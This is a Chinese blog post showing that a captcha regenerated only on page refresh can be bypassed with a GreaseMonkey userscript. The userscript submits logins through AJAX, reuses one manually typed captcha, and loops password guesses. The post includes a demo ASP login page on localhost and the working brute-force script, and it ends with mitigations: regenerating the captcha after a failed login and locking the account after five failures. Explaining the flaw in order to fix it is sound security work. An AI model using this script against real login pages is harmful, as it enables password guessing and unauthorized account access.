GreaseMonkey让网站登录验证码形同虚设

最新推荐文章于 2023-08-06 17:13:40 发布
最新推荐文章于 2023-08-06 17:13:40 发布
阅读量3.3k 收藏 2
点赞数
分类专栏: Web开发 文章标签: 服务器 session login 脚本 function button
通常,为了增加暴力猜解网站用户密码的难度,我们会在网页登录框中增加一个验证码,验证码保存在服务器端,而客户端则使用一张图片显示:



验证码在整个登录过程表现为:用户打开登录页面时,服务器产生一个验证码,点击登录后,跳转到登录页面,服务器端检查用户输入的验证码是否正确,若错误,跳回到登录页面,生成一个新验证码让用户再次输入登录。 注意,生成新验证码的条件是登录页面刷新了!

以前没觉得这有什么问题,今天了解12306自动登录脚本后,发现这问题太严重了,当使用GreaseMonkey时,简直可以无视验证码的存在,原因是 借助GreaseMonkey可以在页面使用Ajax提交表单进行登录,这过程不会刷新登录页面,所以服务器不会生成新验证码,因而只要手工输下验证码,脚本就可以不断尝试登录进行猜解用户名密码!

1.GreaseMonkey自动登录演示

为了减少代码量,便于说明问题,下边演示时验证码不转为图形,直接输出Session,效果一样,不影响结论。

 

Default.asp:
View Code
<%@LANGUAGE= " VBSCRIPT " CODEPAGE= " 65001 "%>
<!DOCTYPE html  PUBLIC  " -//W3C//DTD XHTML 1.0 Transitional//EN "  " http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd ">
<html xmlns= " http://www.w3.org/1999/xhtml ">
<head>
<meta http-equiv= " Content-Type " content= " text/html; charset=utf-8 " />
<title>登录演示</title>
</head>

<body>
<%
Randomize
SESSION( " passCode ") =  Int( 8999* Rnd+ 1000' 生成验证码
%>
<form id= " form1 " name= " form1 " method= " post " action= " Login.asp ">
用户名:<input type= " text " name= " txtUsn " id= " txtUsn " /><br />
密码:<input type= " text " name= " txtUsp " id= " txtUsp " /><br />
验证码:<input type= " text " name= " txtPassCode " id= " txtPassCode " /><%=SESSION( " passCode ")%> <br />
<input type= " submit " name= " btn1 " id= " btn1 " value= " 提交 " />
</form>
</body>
</html>
Login.asp:
View Code
<%
Response.Charset =  " utf-8 "

Dim usn, usp, code, msg
usn = Request.Form( " txtUsn ")
usp = Request.Form( " txtUsp ")
code = Request.Form( " txtPassCode ")

Response.Write(Login(usn, usp, code))

' 登录函数
Function Login(usn, usp, code)
     If SESSION( " Login ") =  True  Then
        Login =  " 登录成功. "
     Else
         If usn<> ""  And usp<> ""  Then
             If code<> CStr(SESSION( " passCode "))  Then
                Login =  " 验证码出错,请重新输入. "
                 Exit  Function
             End  If
        
             If usn= " admin "  And usp= " admin888 "  Then
                SESSION( " Login ") =  True
                Login =  " 登录成功. "
             Else
                Login =  " 用户名或密码出错,请重新输入. "
             End  If
         Else
            Login =  " 用户未登录. "
         End  If
     End  If    
End Function
%>
复制代码
GreaseMonkey脚本:
View Code
//  ==UserScript==
//  @name           自动登录
//  @namespace      com.mzwu
//  @include        http://localhost/default.asp
//  @require           https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js
//  ==/UserScript==


if( typeof($) != "undefined")
{
    $("body").append("<input type=\"button\" name=\"btn2\" id=\"btn2\" value=\"登录测试\" />");

    $("#btn2").click( function(){
         var usn = "admin";
         var usp = "";
         var code = $("#txtPassCode").val();
         var responseText = "";
         var i = 0;

         while(responseText.indexOf("登录成功") == -1)
        {
            usp = "admin88" + (++i);  // 猜解密码
            $.ajax({
                type : "POST",
                url  : "Login.asp?r=" + Math.random(),
                data : "txtUsn=" + usn + "&txtUsp=" + usp + "&txtPassCode=" + code,
                async:  false,
                success :  function(msg){
                    responseText = msg;
                     if(responseText.indexOf("登录成功") != -1)
                    {
                        alert("登录成功.尝试次数:" + i);
                        location.href = "Login.asp";
                    }
                }
            });
        }
    });

    clearInteval(timer);
}
复制代码
测试结果:

 


2.解决方法

提供两种解决方法供参考:

方法一:当验证登录用户名或密码出错时,服务器端强制生成新验证码;
方法二:当尝试登录5次失败时,将帐户锁定一段时间不能登录;

3.参考资料

[1].Firefox扩展Greasemonkey使用示例: http://www.mzwu.com/article.asp?id=3091

君望永远
关注
专栏目录
reCaptcha 验证码加载(中国大陆加载reCapcha验证码油猴脚本).user.js
09-19
reCaptcha 验证码加载(中国大陆加载reCapcha验证码油猴脚本).user.js
油猴验证码自动填写(包括用户名和密码)+Django
hayratjanmmmm的博客
02-16 1671
油猴验证码自动填写(包括用户名和密码)+Django。
油猴脚本+python:验证码识别辅助器
最新发布
aimersong69的博客
08-06 1986
脚本是一个适配油猴的用户脚本(UserScript),用于在鼠标放在验证码图片上时显示弹窗并提供识别选项。下面将介绍脚本的实现逻辑。
油猴脚本 实现验证码自动滑动
实施之家
05-14 2509
油猴直接安装地址:https://greasyfork.org/zh-CN/scripts/425563-aliyun-slide // ==UserScript== // [url=home.php?mod=space&uid=170990]@name[/url] aliyun_slide // [url=home.php?mod=space&uid=467642]@namespace[/url] [url=https://www.yuban.ltd/]https:/
用Greasemonkey 脚本收藏网站会员信息到本地
09-05
该Greasemonkey脚本专为世纪佳缘交友网站设计,旨在帮助用户方便地收藏感兴趣的会员信息。在未安装脚本之前,用户若想保存某会员信息,需手动复制会员的主页地址。而安装脚本后,搜索结果页的"给我写信"按钮会被替换...
Swedbank-Greasemonkey:用于更改登录选项的 Greasemonkey 脚本
07-04
7. **浏览器兼容性**:Greasemonkey主要适用于Firefox,但类似的Chrome扩展Tampermonkey可以实现类似的功能,让此类脚本在其他浏览器上运行。 通过深入理解这些知识点,用户不仅可以了解Swedbank-Greasemonkey脚本...
Chrome最新4.0版本支持GreaseMonkey脚本
09-28
总的来说,Chrome对GreaseMonkey脚本的支持极大地扩展了浏览器的功能,让用户体验更加个性化。用户不仅可以根据自己的喜好定制浏览器,还能充分利用脚本来提高工作效率和浏览质量。因此,无论是开发者还是普通用户,...
深入浅出Greasemonkey,油猴脚本入门
02-02
深入浅出Greasemonkey,油猴脚本入门 ...通过学习这些内容,您将能够充分发挥 Greasemonkey 的功能,提高您访问网站的体验。 Greasemonkey 是一个功能强大且灵活的工具,能够帮助您更好地访问和使用网站
如何关闭CSDN博客的系统通知
qq_27263265的专栏
09-22 780
如何关闭CSDN博客的系统通知 一、油猴脚本 方式 // ==UserScript== // @name 关闭csdn通知 // @namespace http://tampermonkey.net/ // @version 0.1 // @description try to take over the world! // @author You // @match https://blog.csdn.net/* // @grant
油猴安装、编写及添加脚本 笔记
jayandchuxu的专栏
01-20 6万+
本文在参考深入浅出 Greasemonkey一文后,结合自己实践总结而成,文中大部分内容来源于网上原文,只在实践部分加入自己内容。原文是在Firefox里调试的,我用chrome,所以有些地方不太一样。 有几个相关网站不错: - GreaseSpot is community documentation for user scripting with Greasemonkey.
[原创方法!] 如何实现全自动登录各大网站? Cookie格式 、油猴脚本基础 解决Github邮箱验证,持久登录,免验证码
蜗牛小瀚的私人博客
07-06 7390
之前电脑内存小, 谷歌浏览器又是内存怪物, 每次浏览器不用的时候总是习惯关掉. 这就导致了每次进入常用的网站就要重新登陆, 非常烦;对! 就是即使浏览器保存了密码, 大部分网站仍然要输入一下验证码才能进入(尤其是Github还要邮箱验证)! 可能每个程序员都是强迫症+效率狂热追求者hh. 笔者期间想了各种各样的办法来解决这个问题! 前前后后小一个月,终于完美解决~ 下面笔者想以Bilibili网站登录为例, 按照解决这个问题的时间顺序介绍一下笔者的解决过程; 最...
零基础自学油猴脚本开发(自动过算术题验证码
qydqvvv的博客
10-03 1639
油猴脚本开发自学 自动过算术题验证码 当前功能:目前只实现了按照出现的题目选择正确答案,自动通过验证码 未来添加功能: 1.判断当前视频是否为暂停状态,如果暂停就取消暂停 2.本节视频播放完成则关闭当前网页,刷新课程列表,自动选择课程学习 // ==UserScript== // @name 庆阳继续教育自动填验证 // @namespace http://tampermonkey.net/ // @version 0.1 // @description 庆阳继续教育--自
油猴脚本(Tampermonkey)的简介
热门推荐
imVainiycos的博客
06-10 47万+
油猴脚本的使用 什么是油猴脚本 「油猴」可以通过安装各类脚本网站进行定制。当然伟大的脚本面向的是所有上网者,所以借由各位大神的脚本我们能实现更多更强大的功能,例如: 直接下载百度网盘文件(全速) 重新定制繁杂的微博页面 去掉视频播放广告(甚至播放vip视频) 将网站默认的「二维码登录」改回「账号密码登录」 绕过搜索引擎的跳转提示 还原清新的小说阅读模式 豆瓣和 IMDb 互...
autoCaptcha谷歌浏览器扩展工具-调用api识别验证码图片
diu拿星的博客
05-24 727
autoCaptcha chrome谷歌浏览器扩展工具 调用api识别验证码图片 gitee releases下载地址 api: http://www.bhshare.cn/imgcode/ ps: 推荐油猴脚本–可自动识别页面验证码并填充到输入框 网页通用验证码 安装及操作示例 主要代码 请求图片流 function getImg(src) { return new Promise((resolve, reject) => { fetch(src, { method: 'get',
黄聪:Greasemonkey研究,通过GM_xmlhttpRequest获取远程URL的内容
weixin_34343689的博客
06-09 1076
最近开发火狐,没有任何工具开发程序真的好痛苦,调试JS,只能先依赖Greasemonkey了,今天测试了一下用GM_xmlhttpRequest获取远程URL的内容。在此马克一下。 // ==UserScript== // @name GetDZ // @namespace hcsem.com // @description 从新浪获取当前地址 // @versio...
Jquery 超级简单验证码 源代码 直接复制粘贴就猴了
koreain的博客
09-05 2402
验证码 var chars=[]; for(var a=48;a chars.push(String.fromCharCode(a)); } for(var b=65;b chars.push(String.fromCharCode(b)); } for(var c=97;c chars.push(String.fromCharCode(c)); } function
Python实现京东自动登录
weixin_30405421的博客
03-03 1333
配置好webdriver,用的是Chrome的 import cv2 import time import numpy as np from selenium import webdriver from urllib import request from selenium.webdriver.common.action_chains import ActionChains ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值